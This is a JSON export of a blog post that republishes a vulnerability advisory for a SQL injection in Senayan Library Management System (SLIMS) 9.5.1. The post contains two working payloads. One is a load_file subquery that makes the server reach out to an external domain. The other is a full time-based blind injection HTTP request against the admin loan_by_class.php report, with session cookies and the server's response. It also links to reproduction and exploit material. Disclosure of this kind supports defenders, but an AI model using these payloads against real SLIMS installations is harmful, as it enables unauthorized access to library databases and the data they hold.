{"id":34495,"date":"2022-12-06T21:36:03","date_gmt":"2022-12-06T18:36:03","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/170099\/slims951-sql.txt"},"modified":"2022-12-12T11:06:52","modified_gmt":"2022-12-12T07:36:52","slug":"senayan-library-management-system-9-5-1-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/senayan-library-management-system-9-5-1-sql-injection\/","title":{"rendered":"Senayan Library Management System 9.5.1 SQL Injection"},"content":{"rendered":"<p dir=\"ltr\">## Title: Senayan Library Management System v9.5.1 a.k.a SLIMS 9 SQLi<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 12.06.2022<br \/>\n## Vendor: https:\/\/slims.web.id\/web\/<br \/>\n## Software: https:\/\/slims.web.id\/web\/news\/rilis-9.5.1\/<br \/>\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/slims.web.id\/SLIMS-9.5.1<\/p>\n<p dir=\"ltr\">## Description:<br \/>\nThe manual insertion `point 4` appears to be vulnerable to SQL<br \/>\ninjection attacks.<br \/>\nThe payload &#8216;+(select<br \/>\nload_file(&#8216;\\\\\\\\mmceb8f9w8n0s3mutza4ttmxzo5it8hzknbdy6mv.again.com\\\\ejf&#8217;))+&#8217;<br \/>\nwas submitted in the manual insertion `point 4` testing.<br \/>\nThis payload injects a SQL sub-query that calls MySQL&#8217;s load_file<br \/>\nfunction with a UNC file path that references a URL on an external<br \/>\ndomain.<br \/>\nThe application interacted with that domain, indicating that the<br \/>\ninjected SQL query was executed.<br \/>\nThe attacker can execute a very dangerous `subquery` to view very<br \/>\nsensitive information.<\/p>\n<p dir=\"ltr\">## STATUS: HIGH Vulnerability<\/p>\n<p dir=\"ltr\">[+] Payload:<\/p>\n<p dir=\"ltr\">&#8220;`MySQL<br \/>\nGET \/slims9_bulian-9.5.1\/admin\/modules\/reporting\/customs\/loan_by_class.php?reportView=true&amp;year=2002&amp;class=bbbb%27%2b(select*from(select(sleep(5)))a)%2b%27&amp;membershipType=a&amp;collType=aaaa<br \/>\nHTTP\/1.1<br \/>\nHost: pwnedhost.com<br \/>\nUpgrade-Insecure-Requests: 1<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64)<br \/>\nAppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.5304.107<br \/>\nSafari\/537.36<br \/>\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-US,en;q=0.9<br \/>\nCookie: SenayanAdmin=tc5upjgvv2j3mid2ur5tdmmpje; admin_logged_in=1;<br \/>\nSenayanMember=schm4nbtgbb5i1tbeonr6cav3u<br \/>\nConnection: close<\/p>\n<p dir=\"ltr\">&#8220;`<br \/>\n[+] Response:<\/p>\n<p dir=\"ltr\">&#8220;`MySQL<br \/>\nHTTP\/1.1 200 OK<br \/>\nDate: Tue, 06 Dec 2022 13:51:38 GMT<br \/>\nServer: Apache\/2.4.54 (Win64) OpenSSL\/1.1.1p PHP\/7.4.30<br \/>\nX-Frame-Options: SAMEORIGIN<br \/>\nX-Powered-By: PHP\/7.4.30<br \/>\nExpires: Thu, 19 Nov 1981 08:52:00 GMT<br \/>\nCache-Control: no-store, no-cache, must-revalidate<br \/>\nPragma: no-cache<br \/>\nX-XSS-Protection: 1; mode=block<br \/>\nContent-Length: 4120<br \/>\nConnection: close<br \/>\nContent-Type: text\/html; charset=UTF-8<\/p>\n<p dir=\"ltr\">&lt;!doctype html&gt;<br \/>\n&lt;html&gt;<br \/>\n&lt;head&gt;&lt;title&gt;Loan Report by Class Report&lt;\/title&gt;<br \/>\n&lt;meta http-equiv=&#8221;Content-Type&#8221; content=&#8221;text\/html; charset=utf-8&#8243;\/&gt;<br \/>\n&lt;meta http-equiv=&#8221;Pragma&#8221; content=&#8221;no-cache&#8221;\/&gt;<br \/>\n&lt;meta http-equiv=&#8221;Cache-Control&#8221; content=&#8221;no-store, no-cache,<br \/>\nmust-revalidate, post-check=0, pre-check=0&#8243;\/&gt;<br \/>\n&lt;meta http-equiv=&#8221;Expires&#8221; content=&#8221;Sat, 26 Jul 1997 05:00:00 GMT&#8221;\/&gt;<br \/>\n&lt;link rel=&#8221;stylesheet&#8221; type=&#8221;text\/css&#8221;<br \/>\nhref=&#8221;\/slims9_bulian-9.5.1\/css\/bootstrap.min.css&#8221;\/&gt;<br \/>\n&lt;link rel=&#8221;stylesheet&#8221; type=&#8221;text\/css&#8221;<br \/>\nhref=&#8221;\/slims9_bulian-9.5.1\/admin\/admin_template\/default\/style.css?31085233&#8243;\/&gt;<br \/>\n&lt;script type=&#8221;text\/javascript&#8221;<br \/>\nsrc=&#8221;\/slims9_bulian-9.5.1\/js\/jquery.js&#8221;&gt;&lt;\/script&gt;<br \/>\n&lt;script type=&#8221;text\/javascript&#8221;<br \/>\nsrc=&#8221;\/slims9_bulian-9.5.1\/js\/gui.js&#8221;&gt;&lt;\/script&gt;<br \/>\n&lt;\/head&gt;<br \/>\n&lt;body&gt;<br \/>\n&lt;div id=&#8221;pageContent&#8221;&gt;<br \/>\n&lt;div class=&#8221;mb-2&#8243;&gt;Loan Recap By Class<br \/>\n&lt;strong&gt;bbbb&#8217;+(select*from(select(sleep(5)))a)+'&lt;\/strong&gt; for year<br \/>\n&lt;strong&gt;2002&lt;\/strong&gt; &lt;a class=&#8221;s-btn btn btn-default printReport&#8221;<br \/>\nonclick=&#8221;window.print()&#8221; href=&#8221;#&#8221;&gt;Print Current Page&lt;\/a&gt;&lt;a<br \/>\nhref=&#8221;..\/xlsoutput.php&#8221; class=&#8221;s-btn btn btn-default&#8221;<br \/>\ntarget=&#8221;_BLANK&#8221;&gt;Export to spreadsheet format&lt;\/a&gt;<br \/>\n&lt;a class=&#8221;s-btn btn btn-info notAJAX openPopUp&#8221;<br \/>\nhref=&#8221;\/slims9_bulian-9.5.1\/admin\/modules\/reporting\/pop_chart.php&#8221;<br \/>\nwidth=&#8221;700&#8243; height=&#8221;530&#8243; title=&#8221;Loan Recap By Class&#8221;&gt;Show in<br \/>\nchart\/plot&lt;\/a&gt;&lt;\/div&gt;<br \/>\n&lt;table class=&#8221;s-table table table-sm table-bordered&#8221;&gt;&lt;tr&gt;&lt;th<br \/>\nclass=&#8221;dataListHeaderPrinted&#8221;&gt;Classification&lt;\/th&gt;&lt;th<br \/>\nclass=&#8221;dataListHeaderPrinted&#8221;&gt;Jan&lt;\/th&gt;&lt;th<br \/>\nclass=&#8221;dataListHeaderPrinted&#8221;&gt;Feb&lt;\/th&gt;&lt;th<br \/>\nclass=&#8221;dataListHeaderPrinted&#8221;&gt;Mar&lt;\/th&gt;&lt;th<br \/>\nclass=&#8221;dataListHeaderPrinted&#8221;&gt;Apr&lt;\/th&gt;&lt;th<br \/>\nclass=&#8221;dataListHeaderPrinted&#8221;&gt;May&lt;\/th&gt;&lt;th<br \/>\nclass=&#8221;dataListHeaderPrinted&#8221;&gt;Jun&lt;\/th&gt;&lt;th<br \/>\nclass=&#8221;dataListHeaderPrinted&#8221;&gt;Jul&lt;\/th&gt;&lt;th<br \/>\nclass=&#8221;dataListHeaderPrinted&#8221;&gt;Aug&lt;\/th&gt;&lt;th<br \/>\nclass=&#8221;dataListHeaderPrinted&#8221;&gt;Sep&lt;\/th&gt;&lt;th<br \/>\nclass=&#8221;dataListHeaderPrinted&#8221;&gt;Oct&lt;\/th&gt;&lt;th<br \/>\nclass=&#8221;dataListHeaderPrinted&#8221;&gt;Nov&lt;\/th&gt;&lt;th<br \/>\nclass=&#8221;dataListHeaderPrinted&#8221;&gt;Dec&lt;\/th&gt;&lt;\/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;strong&gt;bbbb&#8217;+(select*from(select(sleep(5)))a)+&#8217;00&lt;\/strong&gt;&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;tr&gt;&lt;td&gt;bbbb&#8217;+(select*from(select(sleep(5)))a)+&#8217;00&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;tr&gt;&lt;td&gt;bbbb&#8217;+(select*from(select(sleep(5)))a)+&#8217;10&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;tr&gt;&lt;td&gt;bbbb&#8217;+(select*from(select(sleep(5)))a)+&#8217;20&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;tr&gt;&lt;td&gt;bbbb&#8217;+(select*from(select(sleep(5)))a)+&#8217;30&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;tr&gt;&lt;td&gt;bbbb&#8217;+(select*from(select(sleep(5)))a)+&#8217;40&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;tr&gt;&lt;td&gt;bbbb&#8217;+(select*from(select(sleep(5)))a)+&#8217;50&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;tr&gt;&lt;td&gt;bbbb&#8217;+(select*from(select(sleep(5)))a)+&#8217;60&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;tr&gt;&lt;td&gt;bbbb&#8217;+(select*from(select(sleep(5)))a)+&#8217;70&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;tr&gt;&lt;td&gt;bbbb&#8217;+(select*from(select(sleep(5)))a)+&#8217;80&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;tr&gt;&lt;td&gt;bbbb&#8217;+(select*from(select(sleep(5)))a)+&#8217;90&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;td&gt;0&lt;\/td&gt;&lt;\/table&gt;&lt;\/div&gt;<br \/>\n&lt;div class=&#8221;loader&#8221;&gt;&lt;\/div&gt;<br \/>\n&lt;!&#8211; block if we inside iframe &#8211;&gt;<br \/>\n&lt;script type=&#8221;text\/javascript&#8221;&gt;<br \/>\n\/\/ if we are inside iframe<br \/>\njQuery(document).ready(function () {<br \/>\n});<br \/>\n&lt;\/script&gt;<br \/>\n&lt;\/body&gt;<br \/>\n&lt;\/html&gt;<br \/>\n&#8220;`<br \/>\n## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/slims.web.id\/SLIMS-9.5.1)<\/p>\n<p dir=\"ltr\">## Proof and Exploit:<br \/>\n[href](https:\/\/streamable.com\/gthu91)<\/p>\n<p dir=\"ltr\">## Time spent<br \/>\n`04:00:00`<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: Senayan Library Management System v9.5.1 a.k.a SLIMS 9 SQLi ## Author: nu11secur1ty ## Date: 12.06.2022 ## Vendor: https:\/\/slims.web.id\/web\/ ## Software: https:\/\/slims.web.id\/web\/news\/rilis-9.5.1\/ ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/slims.web.id\/SLIMS-9.5.1 ## Description: The manual insertion `point 4` appears to be vulnerable to SQL injection attacks. The payload &#8216;+(select load_file(&#8216;\\\\\\\\mmceb8f9w8n0s3mutza4ttmxzo5it8hzknbdy6mv.again.com\\\\ejf&#8217;))+&#8217; was submitted in the manual insertion `point 4` testing. This &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-34495","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34495","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=34495"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34495\/revisions"}],"predecessor-version":[{"id":34733,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34495\/revisions\/34733"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=34495"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=34495"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=34495"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}